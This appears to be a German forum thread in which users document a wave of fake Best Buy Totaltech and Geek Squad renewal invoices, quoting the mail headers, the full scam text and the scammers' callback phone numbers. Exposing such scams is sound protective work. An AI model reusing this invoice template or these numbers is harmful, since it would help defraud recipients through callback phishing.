https://virusscan.jotti.org/en-US/filescanjob/5mcene71y5

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Trojan.Win32.SONBOKLI.AJ/

kjz1
12.04.2023, 15:49
Alte Masche, neue Welle:

Received: from DM4PR02CU002.outbound.protection.outlook.com ([52.101.64.20])
by mx.emig.kundenserver.de (mxeue112 [217.72.192.66]) with ESMTPS (Nemesis)
ID: [ID filtered]
+0200
Received-SPF: Pass (protection.outlook.com: domain of
e.notification.intuit.com designates 167.89.58.138 as permitted sender)
receiver=protection.outlook.com; client-ip=167.89.58.138;
helo=o1.e.notification.intuit.com; pr=C
Received: from o1.e.notification.intuit.com (167.89.58.138) by
BN8NAM11FT006.mail.protection.outlook.com (10.13.177.21) with Microsoft SMTP
Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) ID: [ID filtered]

IP: 167.89.58.138 -> AS11377 - SendGrid, Inc.

Wieder mal von der Schwarzhut-Truppe von Sendgrid, die jedem dahergelaufenen Spammer probeweise direkt ihre Dienste anbieten...


Dear Customer:

Your invoice-675970 for 199.99 is attached towards renewal of 3 years Subscription.

Customer Service for the USA & Canada +1-888-397-5636

Thank you for your business - we appreciate it very much.

Sincerely,

Best Buy Totaltech™
+1-888-397-5636

mit PDF-Anhang:


+1-888-397-5636

+1-888-397-5636

Totaltech™ Best Buy Totaltech™ 3 years membership 199.99

Thank you for choosing our services. We are reaching out to remind you that your
computer Protection Annual subscription has expired and Auto-Renewed today.
We would like to thank you for the completion of the maintenance plan.
We have auto-renewed your plan for 3 years and charged against your
account.
We understand that you are busy and hence could not get through to you when we
are trying to contact you.
HELPLINE :
If you have any question about this invoice or you want to cancel
the subscription,
You can reach out our Customer Support at
Thank you for choosing us. We thank

Bekannte Betrugsmasche:

https://www.pcrisk.de/ratgeber-zum-entfernen/11417-geek-squad-email-scam

Arthur
12.04.2023, 16:06
https://www.pcrisk.de/ratgeber-zum-entfernen/11417-geek-squad-email-scam


Wie kann die Installation von Malware vermieden werden?

Öffnen Sie keinerlei Anhänge und Links, die sich in irrelevanten E-Mails befinden, die von verdächtigen oder unbekannten Adressen aus versendet wurden

Ist weiter perfektioniert worden, dass E-Mails mit scheinbar unverdächtiger Absenderadresse gefakt werden.

kjz1
13.04.2023, 16:27
Offensichtlich wurde die erste Telefonnr. der Gauner schon gesperrt, man macht weiter mit neuer 'maskierter' Nummer:

Received: from DM4PR02CU001.outbound.protection.outlook.com ([52.101.63.10])
by mx.emig.kundenserver.de (mxeue110 [217.72.192.66]) with ESMTPS (Nemesis)
ID: [ID filtered]
+0200
Received: from o1.e.notification.intuit.com (167.89.58.138) by
DM6NAM11FT085.mail.protection.outlook.com (10.13.172.236) with Microsoft SMTP
Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) ID: [ID filtered]


Dear Customer,

Your invoice-706123 for 199.99 is attached towards renewal of 3 years Subscription.

Customer Service for the USA & Canada /1'888'/'397'/'5641'/

Thank you for your business - we appreciate it very much.

Sincerely,
Totaltech™GeekSquad
/1'888'/'397'/'5641'/

kjz1
19.04.2023, 11:45
Wieder dieselben Gauner:

Received: from DM4PR02CU001.outbound.protection.outlook.com ([52.102.139.16])
by mx.emig.kundenserver.de (mxeue010 [212.227.15.40]) with ESMTPS (Nemesis)
ID: [ID filtered]
+0200
Received: from o3.e.notification.intuit.com (167.89.82.233) by
DS1PEPF0000E63B.mail.protection.outlook.com (10.167.17.73) with Microsoft
SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) ID: [ID filtered]


Dear Customer:

Your invoice-867806 for 199.99 is attached towards renewal of 3 years Subscription.

For any Queries you can reach us at /1'888'/'397'/'6051'/

Thank you for your business - we appreciate it very much.

Sincerely,
Totaltech™GeekSquad
/1'888'/'397'/'6051'/